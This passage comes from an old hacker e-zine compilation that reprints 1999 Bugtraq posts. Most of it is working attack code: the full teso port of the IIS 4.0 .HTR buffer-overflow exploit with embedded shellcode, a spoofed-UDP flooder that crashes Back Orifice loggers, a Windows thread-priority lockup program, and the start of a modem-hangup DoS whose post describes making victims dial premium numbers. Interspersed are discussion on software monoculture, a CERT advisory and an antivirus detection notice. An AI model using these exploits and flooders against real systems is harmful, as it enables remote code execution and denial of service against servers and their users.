                theSploit[655] = (char) 0xCC; //int 3
                theSploit[656] = (char) 0xCC; //int 3
                theSploit[657] = (char) 0xCC; //int 3
                theSploit[658] = (char) 0x90; //nop
                theSploit[659] = (char) 0x90; //nop
                theSploit[660] = (char) 0x90; //nop
                theSploit[661] = (char) 0x90; //nop
            }
            else
            {
                // send the user-supplied payload from
                // a file. Yes, that's a 2K buffer for
                // mobile code. Yes, that's big.
                FILE *in_file;
                in_file = fopen(argv[2], "rb");

                if(in_file)
                {
                    int offset = 650;
                    int c;
                    // read byte by byte; checking the return value of fgetc
                    // rather than feof() keeps the EOF marker out of the buffer
                    while( (offset < 3000) && ((c = fgetc(in_file)) != EOF))
                    {
                        theSploit[offset++] = (char)c;
                    }
                    fclose(in_file);
                }
            }

            send(s, theSploit, strlen(theSploit), 0);
        }
        closesocket(s);
    }
}

--------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 10:59:38 -0000
From: Marc
To: BUGTRAQ@netspace.org
Subject: Update to IIS hole.

Hi,

We have been receiving some eMails from people saying that the iishack.exe on our website is not working for them and is just crashing the remote server. Here is what we know and do not know etc..

We have tested it on the English version of NT4.0, with IIS4.0, Service Pack 4 and 5. We have had some people eMail us that they have this configuration and it is not working... This very well could be possible that the offset we are using is not working for some dll's and such... people might have a different version and what not. For this case we *might* release a second exploit that uses a better offset that should work on all nt4.0 iis4.0 sp4 and sp5 machines but honestly it is not that big of a deal to us. The hole is there, and is exploitable and other people have been writing exploits for it also.

We do know that our exploit probably does not work on sp3 because of the offset we use...
we have gotten a few eMails about this and we never did test nor claim it worked on sp3 but we *might* in our second version of the exploit find an offset that works for sp3 also.

I honestly think this post is in some ways pointless but maybe it will help to cut back some of the eMails we are getting about the above information.

Thank you to everyone who has been helping out.

Signed,
Marc
eEye Digital Security Team
http://www.eEye.com

P.S. Jump on over to technotronic.com for some good information and other exploits and such.

--------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 19:04:20 +0200 (CEST)
From: typo
To: bugtraq@netspace.org
Cc: packetstorm@genocide2600.com
Subject: iis4 remote exploit ported

the teso crew has ported the iis exploit to linux... basically this program does the same as the windows version (written in asm) of this exploit. Produced shellcode is identical.. everything should work.. we haven't tested.

Everyone except rootshell.com is allowed to put a copy of this on his/her/their webpage.

visit #austria on ircnet for newest elite 0day exploits.

scut & typo

/* iis 4.0 exploit
 * by eeye security
 *
 * ported to unix/C by the teso crew.
 *
 * shoutouts to #hax and everyone else knowing us...
 * you know who you are.
 *
 * gcc -o tesoiis tesoiis.c -Wall
 */

/* headers for the stdio, string, socket, fcntl, select and resolver calls below */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int net_connect (struct sockaddr_in *cs, char *server,
    unsigned short int port, char *sourceip,
    unsigned short int sourceport, int sec);

void net_write (int fd, const char *str, ...);

unsigned long int net_resolve (char *host);

char stuff[] = "\x42\x68\x66\x75\x41\x50"; /* "!GET /" */

#define URL_OFFSET 1055

char front[] = "GET /AAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"\x41\x41\x41\x41\x41\x41\xb0\x87\x67\x68\xb0\x87"
"\x67\x68\x90\x90\x90\x90\x58\x58\x90\x33\xc0\x50"
"\x5b\x53\x59\x8b\xde\x66\xb8\x21\x02\x03\xd8\x32"
"\xc0\xd7\x2c\x21\x88\x03\x4b\x3c\xde\x75\xf4\x43"
"\x43\xba\xd0\x10\x67\x68\x52\x51\x53\xff\x12\x8b"
"\xf0\x8b\xf9\xfc\x59\xb1\x06\x90\x5a\x43\x32\xc0"
"\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43\x52\x51"
"\x53\x56\xb2\x54\xff\x12\xab\x59\x5a\xe2\xe6\x43"
"\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43"
"\x52\x53\xff\x12\x8b\xf0\x5a\x33\xc9\x50\x58\xb1"
"\x05\x43\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75"
"\xf4\x43\x52\x51\x53\x56\xb2\x54\xff\x12\xab\x59"
"\x5a\xe2\xe6\x33\xc0\x50\x40\x50\x40\x50\xff\x57"
"\xf4\x89\x47\xcc\x33\xc0\x50\x50\xb0\x02\x66\xab"
"\x58\xb4\x50\x66\xab\x58\xab\xab\xab\xb1\x21\x90"
"\x66\x83\xc3\x16\x8b\xf3\x43\x32\xc0\xd7\x3a\xc8"
"\x75\xf8\x32\xc0\x88\x03\x56\xff\x57\xec\x90\x66"
"\x83\xef\x10\x92\x8b\x52\x0c\x8b\x12\x8b\x12\x92"
"\x8b\xd7\x89\x42\x04\x52\x6a\x10\x52\xff\x77\xcc"
"\xff\x57\xf8\x5a\x66\x83\xee\x08\x56\x43\x8b\xf3"
"\xfc\xac\x84\xc0\x75\xfb\x41\x4e\xc7\x06\x8d\x8a"
"\x8d\x8a\x81\x36\x80\x80\x80\x80\x33\xc0\x50\x50"
"\x6a\x48\x53\xff\x77\xcc\xff\x57\xf0\x58\x5b\x8b"
"\xd0\x66\xb8\xff\x0f\x50\x52\x50\x52\xff\x57\xe8"
"\x8b\xf0\x58\x90\x90\x90\x90\x50\x53\xff\x57\xd4"
"\x8b\xe8\x33\xc0\x5a\x52\x50\x52\x56\xff\x77\xcc"
"\xff\x57\xec\x80\xfc\xff\x74\x0f\x50\x56\x55\xff"
"\x57\xd8\x80\xfc\xff\x74\x04\x85\xc0\x75\xdf\x55"
"\xff\x57\xdc\x33\xc0\x40\x50\x53\xff\x57\xe4\x90"
"\x90\x90\x90\xff\x6c\x66\x73\x6f\x66\x6d\x54\x53"
"\x21\x80\x8d\x84\x93\x86\x82\x95\x21\x80\x8d\x98"
"\x93\x8a\x95\x86\x21\x80\x8d\x84\x8d\x90\x94\x86"
"\x21\x80\x8d\x90\x91\x86\x8f\x21\x78\x8a\x8f\x66"
"\x99\x86\x84\x21\x68\x8d\x90\x83\x82\x8d\x62\x8d"
"\x8d\x90\x84\x21\x78\x74\x70\x64\x6c\x54\x53\x21"
"\x93\x86\x84\x97\x21\x94\x86\x8f\x85\x21\x94\x90"
"\x84\x8c\x86\x95\x21\x84\x90\x8f\x8f\x86\x84\x95"
"\x21\x88\x86\x95\x89\x90\x94\x95\x83\x9a\x8f\x82"
"\x8e\x86\x21\x90\x98\x8f\x4f\x86\x99\x86\x21" /* stick it in here */
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21"
".htr HTTP/1.0";

void
usage (void)
{
    printf ("usage: ./tesoiis host port url\n");
    exit (EXIT_FAILURE);
}

int
main (int argc, char *argv[])
{
    /* yadda,yadda.. you can try exploiting our exploit!!
     * update: hmm.. is this exploitable? gets EIP touched by exit()?
     * gotta check this later...
     */
    char host[256], url[256];
    int port, sd, t = 0;
    int m = 0;
    char *cc, *pfft;
    struct sockaddr_in cs;

    printf ("teso crew IIS exploit.. shellcode by eEye.\n");
    printf ("------------------------------------------\n");

    if (argc < 4)
        usage();

    strcpy (host, argv[1]);
    strcpy (url, argv[3]);
    port = atoi (argv[2]);
    if ((port < 1) || (port > 65535))
        usage();

    /* encode the url: each byte is shifted by 0x21, the first '/' becomes
     * the 6-byte "stuff" prefix */
    cc = url;
    pfft = front + URL_OFFSET;
    while (*cc) {
        if (*cc == '/' && 0 == t) {
            memcpy (pfft, stuff, 6);
            pfft += 6;
            t = 1;
        } else {
            *pfft = *cc + 0x21;
            pfft++;
        }
        cc++;
        m += 1;
    }

    printf ("Host: %s Port: %d Url: %s\n", host, port, url);
    printf ("Connecting... ");
    fflush (stdout);
    sd = net_connect (&cs, host, port, NULL, 0, 30);
    if (sd < 1) {
        printf ("failed!\n");
        exit (EXIT_FAILURE);
    }
    printf ("done.. sending shellcode..");
    fflush (stdout);
    net_write (sd, "%s\n\n", front);
    printf ("done.. closing fd!\n");
    close (sd);
    printf ("%s\n", front);
    exit (EXIT_SUCCESS);
}

int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port,
    char *sourceip, unsigned short int sourceport, int sec)
{
    int n, error, flags;
    socklen_t len;
    int fd;
    struct timeval tv;
    fd_set rset, wset;

    /* first allocate a socket */
    cs->sin_family = AF_INET;
    cs->sin_port = htons (port);

    fd = socket (cs->sin_family, SOCK_STREAM, 0);
    if (fd == -1)
        return (-1);

    if (!(cs->sin_addr.s_addr = net_resolve (server))) {
        close (fd);
        return (-1);
    }

    /* non-blocking connect so the select() below can enforce the timeout */
    flags = fcntl (fd, F_GETFL, 0);
    if (flags == -1) {
        close (fd);
        return (-1);
    }
    n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
    if (n == -1) {
        close (fd);
        return (-1);
    }

    error = 0;

    n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
    if (n < 0) {
        if (errno != EINPROGRESS) {
            close (fd);
            return (-1);
        }
    }
    if (n == 0)
        goto done;

    FD_ZERO(&rset);
    FD_ZERO(&wset);
    FD_SET(fd, &rset);
    FD_SET(fd, &wset);
    tv.tv_sec = sec;
    tv.tv_usec = 0;

    n = select(fd + 1, &rset, &wset, NULL, &tv);
    if (n == 0) {
        close(fd);
        errno = ETIMEDOUT;
        return (-1);
    }
    if (n == -1)
        return (-1);

    if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
        if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
            len = sizeof(error);
            if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
                errno = ETIMEDOUT;
                return (-1);
            }
            if (error == 0) {
                goto done;
            } else {
                errno = error;
                return (-1);
            }
        }
    } else
        return (-1);

done:
    n = fcntl(fd, F_SETFL, flags);
    if (n == -1)
        return (-1);
    return (fd);
}

unsigned long int
net_resolve (char *host)
{
    in_addr_t i;
    struct hostent *he;

    i = inet_addr(host);
    if (i == INADDR_NONE) {
        he = gethostbyname(host);
        if (he == NULL) {
            return (0);
        } else {
            /* copy only the four address bytes; reading an unsigned long
             * through h_addr would over-read on 64-bit hosts */
            memcpy (&i, he->h_addr_list[0], sizeof (i));
            return (i);
        }
    }
    return (i);
}

void
net_write (int fd, const char *str, ...)
{
    char tmp[8192];
    va_list vl;
    int i;

    va_start(vl, str);
    memset(tmp, 0, sizeof(tmp));
    i = vsnprintf(tmp, sizeof(tmp), str, vl);
    va_end(vl);

    send(fd, tmp, i, 0);
    return;
}

--------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 19:09:42 GMT
From: Ethan Benatan
To: BUGTRAQ@netspace.org
Subject: Re: IIS Remote Exploit (injection code)

>>> "Greg" == Greg Hoglund writes:

Greg> I read yesturday on eEye.com that they had discovered a buffer
Greg> overflow in IIS.....

Greg> Lastly, I would simply like to point out that monoculture
Greg> installations are very dangerous. It's a concept from
Greg> agribusiness.. if you have all one crop, and a virus comes
Greg> along that can kill that crop, your out of business.

Very true, and this is a terrifically important message to get out. Not to be pedantic but actually it is a concept from ecology: the "business", as Greg puts it, can be any system. Diversity makes for resilience, and vice versa.

Okay aleph, it's not a bug but it is a way we should be thinking.

Greg> With
Greg> almost ALL of the IIS servers on the net being vulnerable to
Greg> this exploit, we also have a monoculture. And, it's not just
Greg> IIS. The backbone of the Internet is built on common router
Greg> technology (such as cisco IOS). If a serious exploit comes
Greg> along for the IOS kernel, can you imagine the darkness that
Greg> will fall?
Ethan
ethan+@pitt.edu

--------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 16:40:25 -0400
From: Dug Song
To: BUGTRAQ@netspace.org
Subject: Re: IIS Remote Exploit (injection code)

On Wed, 16 Jun 1999, Ethan Benatan wrote:

> Very true, and this is a terrifically important message to get out...
> Diversity makes for resilience, and vice versa.

see stephanie forrest's work on computer immunology:

        http://www.cs.unm.edu/~immsec/

and to a lesser extent, random "canary" values in StackGuard:

        http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/

and the introduction of randomness to defeat race attacks, predictable
sequence number attacks, etc. in OpenBSD:

        http://www.openbsd.org/crypto.html

-d.

---
http://www.monkey.org/~dugsong/

--------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 15:03:52 -0700
From: Crispin Cowan
To: BUGTRAQ@netspace.org
Subject: Diversity (was: IIS Remote Exploit (injection code))

Dug Song wrote:

> On Wed, 16 Jun 1999, Ethan Benatan wrote:
>
> > Very true, and this is a terrifically important message to get out...
> > Diversity makes for resilience, and vice versa.
>
> see stephanie forrest's work on computer immunology:
>
>         http://www.cs.unm.edu/~immsec/
>
> and to a lesser extent, random "canary" values in StackGuard:
>
>         http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/

StackGuard came about because we investigated the approach of using
diversity to resist attack, and found it to be VERY limited in
effectiveness. The core problem is that when you change things, you
create incompatibilities for friend and foe alike, i.e. a diversity hack
strong enough to defeat an attacker is also likely to break a lot of
YOUR applications. This occurs because:

   * The diversity hack must preserve many invariants that are
     necessary to keep legitimate applications running, and these
     invariants are often subtle and unknown, e.g. Linux applications
     that only work on Red Hat systems.
   * Simultaneously, the diversity hack must BREAK the invariants that
     the attacker depends on, and these invariants are mostly unknown.
     If you knew what they were, you would have fixed the bug :-)

Having discovered that diversity is hard to make both effective and
practical, we moved on to study what we call "restrictions." A
restriction prohibits certain classes of behavior that are always known
to be bad, e.g. changing the return address of an active function, which
is what stack smashes try to do, and what StackGuard prevents.

It is our conjecture that for every diversity hack that one can propose,
there is a restriction hack that is easier to deploy and more effective.
This has been true in practice as we try to construct security-enhancing
tools.

Full papers on these ideas can be found here:

http://www.cse.ogi.edu/DISC/projects/immunix/survivability.html

Crispin
-----
Crispin Cowan, Research Assistant Professor of Computer Science, OGI
    NEW:  Protect Your Linux Host with StackGuard'd Programs  :FREE
          http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
          Microsoft: Putting the "lame" in "layman"

--------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 16:30:12 -0400
From: CERT Advisory
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@coal.cert.org
Subject: CERT Advisory CA-99.07 - IIS Buffer Overflow

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-99-07 IIS Buffer Overflow

   Originally released: June 16, 1999
   Source: CERT/CC

Systems Affected

   * Machines running Microsoft Internet Information Server 4.0.

I. Description

   A buffer overflow vulnerability affecting Microsoft Internet
   Information Server 4.0 has been discovered in the ISM.DLL library.
   According to Microsoft, ISM.DLL is the "filter DLL that processes
   .HTR files. HTR files enable remote administration of user
   passwords." A tool to exploit this vulnerability has been publicly
   released.

II. Impact

   This vulnerability allows remote intruders to execute arbitrary code
   with the privileges of the IIS server. Additionally, intruders can
   use this vulnerability to crash vulnerable IIS processes.

III. Solution

   Microsoft has released Microsoft Security Bulletin MS99-019
   describing a workaround to this problem. Additionally, Microsoft is
   working on a patch to fix this problem; information regarding this
   patch will be available in the Microsoft Security Bulletin. We
   encourage you to read this bulletin, available from

   http://www.microsoft.com/security/bulletins/ms99-019.asp

   We will update this advisory as more information becomes available.
   Please check the CERT/CC web site for the most current revision.

______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html.

______________________________________________________________________

CERT/CC Contact Information

   Email: cert@cert.org
   Phone: +1 412-268-7090 (24-hour hotline)
   Fax: +1 412-268-6989
   Postal address:
      CERT Coordination Center
      Software Engineering Institute
      Carnegie Mellon University
      Pittsburgh PA 15213-3890
      U.S.A.

   CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
   Monday through Friday; they are on call for emergencies during other
   hours, on U.S. holidays, and on weekends.

Using encryption

   We strongly urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from
   http://www.cert.org/CERT_PGP.key.
   If you prefer to use DES, please call the CERT hotline for more
   information.

Getting security information

   CERT publications and other security information are available from
   our web site http://www.cert.org/.
   To be added to our mailing list for advisories and bulletins, send
   email to cert-advisory-request@cert.org and include SUBSCRIBE
   your-email-address in the subject of your message.

Copyright 1999 Carnegie Mellon University.
Conditions for use, disclaimers, and sponsorship information can be
found in http://www.cert.org/legal_stuff.html.

* "CERT" and "CERT Coordination Center" are registered in the U.S.
  Patent and Trademark Office

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie Mellon
University makes no warranties of any kind, either expressed or implied
as to any matter including, but not limited to, warranty of fitness for
a particular purpose or merchantability, exclusivity or results obtained
from use of the material. Carnegie Mellon University does not make any
warranty of any kind with respect to freedom from patent, trademark, or
copyright infringement.

Revision History

June 16, 1999: Initial release

--------------------------------------------------------------------------------

Date: Mon, 21 Jun 1999 12:23:27 +0300
From: Mikko Hypponen
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Alert: Microsoft Security Bulletin (MS99-019) - IIS Fix Available

Russ:

>Microsoft have released a patch for IIS 4.0 which addresses the issues
>uncovered by eEye.

Also, if you want to monitor who's running IISHACK in your organisation,
we've added detection of this tool (as a trojan horse) into latest
updates for F-Secure Anti-Virus. This detects the original IISHACK.EXE
as released by eEye with the name "Trojan.IIS_Hack".

For more information, see our Virus News Updates at:
http://www.datafellows.com/news/vir-news/

--
Mikko Hermanni Hyppönen, Mikko.Hypponen@DataFellows.com
Manager, Anti-Virus Research, Data Fellows Corp.
Integrated Solutions for Enterprise Security
Tel +358 9 8599 0513 - fax +358 9 8599 0713
http://www.DataFellows.com/staff/hermanni/

@HWA

112.0 BO server flooder sends random spoofed udp's to the attacker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/**************************************/
/* Back orifice server flooder        */
/* Send random spoofed udp bo packet  */
/* to some lame logger                */
/* This code crash with just 5 packet */
/* the old fakebo and the real one    */
/* The lasted just need more packet   */
/* to crash ;)                        */
/* Another code from Bong             */
/* bong26@hotmail.com                 */
/**************************************/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))
#define err(x) { fprintf(stderr, x); exit(1); }

int i;
char data[] = { 0xCE, 0x63, 0xD1, 0xD2, 0x16, 0xE7, 0x13, 0xCF, 0x3D, 0xA5, 0xA5,
                0x86, 0xB2, 0x75, 0x4B, 0x99, 0x9F, 0x18, 0x58, 0x86, 0x89, 0x99 };

void brek(int no)
{
    printf("\nStoped\n%d packet sended!\n", i);
    exit(1);
}

int sendpkt_udp (sin, sock, data, len, src, dst, sport, dport)
    struct sockaddr_in *sin;
    unsigned short int sock, len, sport, dport;
    unsigned long int src, dst;
    char *data;
{
    struct iphdr ip;
    struct udphdr udp;
    static char packet[8192];
    char crashme[500];

    ip.ihl = 5;
    ip.version = 4;
    ip.tos = rand () % 100;
    ip.tot_len = htons (28 + len);
    ip.id = htons (31337 + (rand () % 100));
    ip.frag_off = 0;
    ip.ttl = 255;
    ip.protocol = IPPROTO_UDP;
    ip.check = 0;
    ip.saddr = src;
    ip.daddr = dst;

    udp.source = htons (sport);
    udp.dest = htons (dport);
    udp.len = htons (8 + len);
    udp.check = (short) 0;

    memcpy (packet, (char *) &ip, sizeof (ip));
    memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
    memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, len);
    memcpy (packet + sizeof (ip) + sizeof (udp) + len, crashme, 500);

    return sendto (sock, packet, sizeof (ip) + sizeof (udp) + len + 500, 0,
                   (struct sockaddr *) sin, sizeof (struct sockaddr_in));
}

unsigned int lookup (char *host)
{
    unsigned int addr;
    struct hostent *he;

    addr = inet_addr (host);
    if (addr == -1) {
        he = gethostbyname (host);
        if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
            return 0;
        bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
    return (addr);
}

void main (int argc, char **argv)
{
    unsigned int src, dst;
    char *tmpsrc;
    struct sockaddr_in sin;
    struct hostent *hep;
    long wait = 25000;
    int sock, dstP, srcP = 113, nb = 1, mod, a, b, c, d;

    signal(SIGINT, brek);

    if (argc < 3) {
        printf("\nBo logger flooder by Bong\n");
        printf("Usage: %s [source] [numb]\n", argv[0]);
        printf("Mode 1: one source\n");
        printf("Mode 2: random source\n\n");
        exit(1);
    }

    if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        err("Unable to open raw socket.\n");

    mod = atoi(argv[1]);
    if (mod == 1) {
        if (argc < 4)
            printf("Need at least 3 argument");
        if (!(src = lookup (argv[2])))
            err ("Unable to lookup address.\n");
        if (!(dst = lookup (argv[3])))
            err ("Unable to lookup address.\n");
        tmpsrc = (argv[3]);
        if (argv[4]) {
            nb = atoi(argv[4]);
        }
    } else {
        if (!(dst = lookup (argv[2])))
            err("Unable to lookup address..\n");
        tmpsrc = (argv[2]);
        if (argv[3]) {
            nb = atoi(argv[3]);
        }
    }

    sin.sin_family = AF_INET;
    sin.sin_port = 31337;
    sin.sin_addr.s_addr = dst;

    printf("Flood %s with mode %d and %d packet\n", tmpsrc, mod, nb);

    for (i = 0; i < nb; i++) {
        if (mod == 2) {
            srandom((time(0) + i));
            srcP = getrandom(1, 1500) + 1000;
            a = getrandom(0, 255);
            b = getrandom(0, 255);
            c = getrandom(0, 255);
            d = getrandom(0, 255);
            sprintf(tmpsrc, "%i.%i.%i.%i", a, b, c, d);
            hep = gethostbyname(tmpsrc);
            src = *(unsigned long *) hep->h_addr;
        }
        if ((sendpkt_udp (&sin, sock, &data, sizeof(data), src, dst, srcP, 31337)) == -1)
            err ("Error sending the UDP packet.\n");
    }
    printf("\n%d Packet sended!\n", i);
}

@HWA

113.0 frootcake.c revisited
~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 9 Jun 1999 23:46:05 +1000
From: kiva
To: BUGTRAQ@netspace.org
Subject: ordinary users bringing NT to its knees [repost]
[Aleph, sorry about my original post - I pasted the wrong code! oops! :) ]

Hi,

sorry if problems like this are known, but I thought I'd post this just
in case...

I was curious at how well NT could handle *lots* of threads, so I wrote
the following. It basically locks up the system with an inability to
kill the process because (I) never get the task manager up. Pretty bad
since an ordinary user can run it :/

my system: 2xPPro with NT4 (SP5), 128megs RAM.

cheers

----------------------------

/*
 * frootcake.c
 * kiva@wookey.org
 *
 * this tests NT at coping with *really dodgy* code...
 * it totally brings my SMP box to being unusable (SP5)
 */

#include <windows.h>
#include <stdio.h>

void poobah();

DWORD WINAPI thread_func (LPVOID lpv)
{
    DWORD id;
    HANDLE h;
    BOOL success = 1;

    /* every thread spawns another one, then keeps resetting its priority */
    h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);

    while (success) {
        switch (GetThreadPriority (h)) {
        case THREAD_PRIORITY_ABOVE_NORMAL:
            success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
            break;
        case THREAD_PRIORITY_BELOW_NORMAL:
            success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
            break;
        case THREAD_PRIORITY_HIGHEST:
            success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
            break;
        case THREAD_PRIORITY_IDLE:
            success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
            break;
        case THREAD_PRIORITY_LOWEST:
            success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
            break;
        case THREAD_PRIORITY_NORMAL:
            success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
            break;
        }
    }
    poobah();
    return 0;
}

void poobah()
{
    DWORD id;
    HANDLE h;

    h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
    SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
    poobah();
}

int main ()
{
    printf ("frootcake - kiva@wookey.org\n");
    poobah();
    return 0;
}
/* eof */

--------------------------------------------------------------------------------

Date: Thu, 10 Jun 1999 12:34:23 -0700
From: David Schwartz
To: BUGTRAQ@netspace.org
Subject: Re: ordinary users bringing NT to its knees [repost]

This is just an exploit for the 'neverending quantum' bug that's been
known for ages. See http://www.sysinternals.com/tips.htm#NEQuantum

It has nothing to do with the number of threads running (except that you
need at least one per CPU). The bug occurs when a thread changes its
priority. NT changes the thread's priority, but also gives it a new
execution quantum. By repeating this process, a single thread can
monopolize a CPU.

DS

--------------------------------------------------------------------------------

Never-ending Quantum?

In NT, as with most time-sharing operating systems, threads run in turns
called quantums. Normally, a thread executes until its quantum runs out.
The next time it is scheduled it starts with a full quantum. However, in
NT a thread also gets its quantum refreshed every time its thread or
process priority is set. This means that a thread can reset its quantum
by calling SetThreadPriority (without changing its priority) before its
turn runs out. If it continues to do this it will effectively have an
infinite quantum. Why does NT do this? It's not clear, but it appears to
be a bug.

@HWA

114.0 gin.c spoofs packets containing + + + ATH0 which causes some modems to hang up
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[ www.rootshell.com ]

From jpester@engr.csulb.edu Sun Jun  6 22:09:57 1999
Date: Sun, 6 Jun 1999 22:05:49 -0700 (PDT)
From: Jonathan Pester
To: submission@rootshell.com
Subject: 'new' DoS

Hey kids, amputee here...

Pointed out to me recently was a 'new' DoS if you can call it that..I'm
sure lots of people have thought of doing this, but I haven't seen or
heard of anything like it yet.
So here goes, as usual a code to test the exploit is attached below, now
for a long boring technical explanation (script kiddiez, skip to the
code now)

[ explanation ]

The way the exploit works is it hides escape/control sequences in an
ICMP echo_request packet (it contains the string +++ATH0) the +++ sends
the modem into escape mode (and if the guard time on the modem is set
ridiculously low) it will go into command mode and you can issue it an
ATH0 to hang up. It works on the reply, because it receives the
echo_request packet, then duplicates the packet with a new timestamp and
checksum, dest/source hosts and returns it to the sender, when it
returns it the string is sent to the modem, and thus hanging it up.

There are a few conditions that must be met for it to work (if you don't
want to be vulnerable to this, fix these!)

1) target computer must not filter ICMP echo_request and must know how
   to reply to one if it gets one
2) target computer must be using a modem (you can't hangup DS3s,
   although i suppose you could hangup telco return connections..if you
   can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set
   ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't i guess
   you can use your own address, but then the target knows where it came
   from)

In my experimenting, I have also devised various fun ways to use this
program other than just nuking your buddy off IRC. In theory..it is
possible to modify the program to do fun stuff like make the target call
some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the
modem hangup, pause for 6 seconds then call 5551212..this is fun for
obvious reasons.
Then the next variation I came up with is a smurf like implementation in
which you could make a script to DoS a class C subnet, with the number
of your least favorite company, since most companies have 800 numbers,
not only does this cause chaos to the phone bank, but also costs ~$.30
per call...but i don't condone any of those ideas of course, this is
just for experimental/educational purposes only, if you fix your modems,
none of this is possible, so get off your ass and fix it.

script kiddiez: here is your code...

--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE ---
/*
 * gin.c [ fuck the soda nukers, im no kiddie ]
 *
 * [ http://www.rootshell.com/ ]
 *
 * [ sarcastic program description here ]
 * pff, hey kiddiez! this program sends mad packets to some foo from
 * every broadcast address on earth, mad leet yo...
 * (you really wanna know what it does? LEARN TO CODE! and stop being a
 * gayass fuckin script kiddie)
 *
 * Author: amputee (amputee@fack.net)
 * Compiled on:
 *      Linux 2.2.9 i586 (GNU/Debian 2.2 development version)
 *      egcs-2.91.66
 *
 * [ time for greets, and fuck yous ]
 *
 * [ Greets (in no logical order) ]
 * scummy, fobia (come back foo), ignitor, stalin, bigs, rotafer, statix
 * silencers, blackang|, porp, the rest of #shutdown, soldier, klepto,
 * drastic, the other #havok OGs and #eof, governor, cry0mance, gixerboy,
 * protocol-, broknbonz, abalution, and anyone else i forgot that isn't
 * in my fuck you list...
 *
 * [ Fuck yous ]
 * spawn66x1 <--hahah, nucleoid (aka dynamo, emulate, microbe, immune,
